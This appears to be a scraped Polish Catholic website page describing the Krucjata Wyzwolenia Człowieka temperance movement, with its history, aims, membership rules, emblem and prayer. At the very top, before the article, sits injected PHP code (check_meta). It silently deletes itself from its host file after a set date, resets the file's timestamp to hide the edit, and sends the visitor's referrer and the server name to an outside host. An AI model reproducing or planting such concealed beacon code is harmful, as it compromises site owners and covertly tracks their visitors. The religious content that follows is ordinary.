check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456732005){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=5&id=18776729&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_contact/models/content.php"); } Krucjata Wyzwolenia Człowieka
Krucjata Wyzwolenia Człowieka Drukuj Email
Wpisany przez ks. Dominik Dryja   
piątek, 15 stycznia 2010 13:00

 

 

Krucjata Wyzwolenia Człowieka lub KWC - dzieło na rzecz trzeźwości narodu zainicjowane w 1979 roku przez ks. Franciszka Blachnickiego, założyciela Ruchu Światło-Życie.

 

  • Historia

Pierwowzorem Krucjaty Wyzwolenia Człowieka jest Krucjata Wstrzemięźliwości, założona przez ks. Franciszka Blachnickiego, zlikwidowana w 1960 przez Służbę Bezpieczeństwa.

Jako bezpośredni bodziec do utworzenia KWC postrzegane jest wezwanie papieża Jana Pawła II: "Proszę, abyście przeciwstawiali się wszystkiemu, co uwłacza ludzkiej godności i poniża obyczaje zdrowego społeczeństwa, co czasem może umniejszać jego wkład do wspólnego skarbca ludzkości, narodów chrześcijańskich, Chrystusowego Kościoła."

Obecnym moderatorem krajowym KWC jest ks. Adam Wąsik

 

  • Założenia

U podstaw KWC leży zniewolenie, rozumiane jako psychiczne uzależnienie, w szczególności od alkoholu, przejawiające się m.in. alkoholizmem, przyzwoleniem na alkoholizm, brakiem asertywności w sytuacjach szczególnie nadmiernego spożywania alkoholu, lękiem-obawami przed udziałem w wydarzeniach (np. weselach, chrztach, zabawach), na których (inaczej niż zazwyczaj) alkoholu nie ma. Ks. Franciszek Blachnicki stosował również określenie „terror alkoholowy” do opisania towarzyskiego przymusu picia.

Jedno z haseł KWC mówi: Przez abstynencję wielu do trzeźwości wszystkich. Kandydaci i członkowie KWC zobowiązują się nie pić napojów alkoholowych, nie częstować alkoholem i nie wydawać na niego pieniędzy oraz modlić się za ludzi nadużywających go. Jest to związane zawsze z postem, modlitwą i jałmużną. Nie jest to wyłącznie abstynencja, ale przede wszystkim pomoc w „uwalnianiu człowieka ze wszystkiego, co go zniewala i uwłacza jego godności”.

 

  • Cele Krucjaty Wyzwolenia Człowieka:


    - członkowie KWC ukazują swoim sposobem życia jedną z dróg rozwoju duchowego, opierającego się na wartościach chrześcijańskich, w szczególności miłości bliźniego
    - potrafią dać świadectwo człowieka w pełni wyzwolonego od wszelkich zniewoleń
    - nie zgadzają się na przymusowe picie alkoholu
    - zachęcają do spotkań towarzyskich bez alkoholu
    - starają się pomóc wszystkim ludziom zniewolonym – nie tylko przez alkohol

 

  • Są dwa rodzaje przynależności do Krucjaty Wyzwolenia Człowieka:


    - kandydat – deklaruje przynależność do KWC na okres jednego roku
    - członek – deklaruje przynależność od momentu podjęcia do czasu ewentualnej rezygnacji (ten rodzaj bywa błędnie określany jako przynależność na całe życie lub na czas istnienia Krucjaty)

Członkowie i kandydaci składają swoje deklaracje abstynenckie do tzw. Stanic Krucjaty (ośrodków Krucjaty, centralnego bądź rejonowych). Stanica nr 1 znajduje się w Krościenku nad Dunajcem w Centrum Ruchu Światło-Życie na Kopiej Górce. Informację o rezygnacji wysyła się również do Stanicy.
 

  • Herb

Przesłanie Krucjaty wyraża jej herb. Zawołaniem są słowa Chrystusa Nie lękajcie się! i przywoływane przez Jana Pawła II. Przypominają one członkom Krucjaty, że głównym ich zadaniem jest „wyzwalanie ludzi od lęku, który czyni człowieka niewolnikiem”.

Krzyż to znak wyprawy krzyżowej, a zarazem znak postrzegany przez Chrześcijan jako symbol zwycięstwa.

Litera „M” symbolizuje stojącą pod Krzyżem Maryję, traktowaną jako wzór oddania się członków KWC Chrystusowi (w chrześcijaństwie dość popularny jest wątek posłuszeństwa Maryi wobec woli Boga)

Małe „m” po drugiej stronie Krzyża symbolizuje słowo „my” odnoszące się do przynależących do KWC

  • Modlitwa

Niepokalana, Matko Kościoła! Wpatrując się w Ciebie, jako wzór Człowieka w pełni odkupionego i wyzwolonego i dlatego przez miłość bezgranicznie oddanego w Duchu Świętym Chrystusowi, uświadamiamy sobie wieloraką niewolę, w której są uwikłane nasze serca.
Pragnąc w pełni wyzwolić siebie i podać rękę naszym braciom oczekującym objawienia się w nich wolności synów Bożych, zbliżamy się do Ciebie i oddajemy się Tobie, aby wraz z Tobą, mocą tego samego Ducha, który bez przeszkód działał w Tobie, pełniej zrealizować swoją wolność w oddaniu się Chrystusowi a przez Niego - Ojcu.
W Twoje ręce składamy przyrzeczenie abstynencji od alkoholu i postanowienie całkowitego uniezależnienia się od niego, abyśmy mogli swoją wolnością wyzwalać naszych braci, którzy nie mogą już wyzwolić się o własnych siłach. Pragniemy przez ten czyn miłości podać rękę i służyć naszym bliźnim, tak jak Chrystus, który z miłości ku nam uniżył samego siebie, przyjąwszy postać sługi. Oddajemy Ci całe dzieło Krucjaty Wyzwolenia Człowieka pragnąc, aby było ono Twoim dziełem i narzędziem w Twoim ręku dla wyzwolenia narodu.
Chcemy wraz z Tobą i z oddanym Ci całkowicie sługą Bożym, Janem Pawłem II stanąć pod krzyżem Chrystusa, wyznając, iż tylko zjednoczenie z Nim w miłości, której wyrazem jest ofiara, może wyzwolić życiodajną i macierzyńską moc dla ratowania tych, którzy stali się niewolnikami dlatego, że utracili zdolność miłowania czyli posiadania siebie w dawaniu siebie.
Święty Stanisławie, Biskupie i Męczenniku, Patronie Krucjaty Wyzwolenia Człowieka, natchnij nas odwagą w dawaniu świadectwa i męstwem w obliczu trudności i prześladowań, abyśmy bez lęku pracowali nad odbudową ładu moralnego w naszej Ojczyźnie. Święty Maksymilianie Kolbe, naucz nas miłować braci kosztem ofiary z siebie. Amen.

ks. Franciszek Blachnicki

 

  • Deklaracja:

Deklarację można zapisać na dysk klikając tutaj   .


źródła:
http://pl.wikipedia.org;
http://www.kwc.oaza.pl;
materiały własne.

 
 

POLECAMY
Diecezja Tarnowska Konferencja Episkopatu Polski Gość Niedzielny